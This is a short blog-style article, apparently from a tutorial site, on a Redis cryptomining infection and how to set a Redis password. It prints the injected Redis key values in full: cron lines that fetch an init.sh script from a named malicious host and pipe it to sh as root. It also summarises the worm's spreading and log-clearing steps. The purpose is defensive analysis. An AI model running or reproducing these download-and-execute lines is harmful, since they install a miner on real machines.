You don’t need to set a password for the intranet environment, but it is necessary to set a password for personal servers and online public network servers.
Yesterday I checked minio's event notification in redis. When I checked the redis key, I found several unusual keys. backup1, backup2, backup3. Then I guessed it was a mining virus.
As shown below: In this way, the scheduled tasks and scripts are injected into our machine, and the init.sh script will start to be executed.
backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n" backup2 "\n\n\n*/3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n" backup3 "\n\n\n*/4 * * * * root curl -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n" backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n"
en2an.top/cleanfda/in…
We can check the value of this key and get that it will request an address. Let’s open it and see what this init.sh is.
As shown below is a script file.
There are quite a lot of scripts for this. Turn off selinux, kill other people’s mining processes, and kill processes that take up too much CPU. If it’s your own, just skip it and modify it. Destroy system commands, create your own downloads() function, unlock and add locked tasks, add mining technology tasks, set up SSH password-free login, download and execute mining machine mining programs, turn off firewalls, clear logs, known infections For a password-free machine, download and execute is.sh.
en2an.top/cleanfda/is…
As shown in the figure below, the init.sh above will download our is.sh script.
Let’s take a look at what this script does.
As shown in the picture below, this script has quite a lot of content. Download the masscan scanner, download the pnscan scanner, install redis to create a redis unauthorized access vulnerability, and execute rs.sh.
en2an.top/cleanfda/rs…
You can view the content of this script through the above link.
Open port 6379, automatically use redis to write scheduled tasks without authorization, use pnscan to scan IP 6379 port in segment b, and use masscan to scan ports.
Through the above analysis, it can be concluded that the virus essentially works by injecting mining scripts into redis. If your redis does not have a password set and is exposed on the public Internet, be careful.
You can set the password for our redis in the following two ways.
It should be noted that because this method modifies the configuration file, we need to restart our redis to take effect.
Find our redis.conf file.
Windows is shown in the figure below
We edit this file, find requirepass, release the comment, set the specified value, and restart redis to take effect.
Since the installation method may vary from person to person, I installed it through docker and mapped it. I won’t demonstrate it to you here. Find the redis directory installed on Linux and find the redis.conf configuration file. The same operation as in windows. After configuring, restart and it will be OK.
Connect to our redis, and then set the password through instructions.
This method is relatively simple and takes effect without restarting.
The following command means to set the password to 123456. The public network should not set it so simply.
config set requirepass 123456
Let’s check our redis password.
config get requirepass
In this way, our password is set successfully, and it will take effect when we exit our redis client and connect again.
The above is the detailed content of What is the reason why Redis must set a password?. For more information, please follow other related articles on the PHP Chinese website!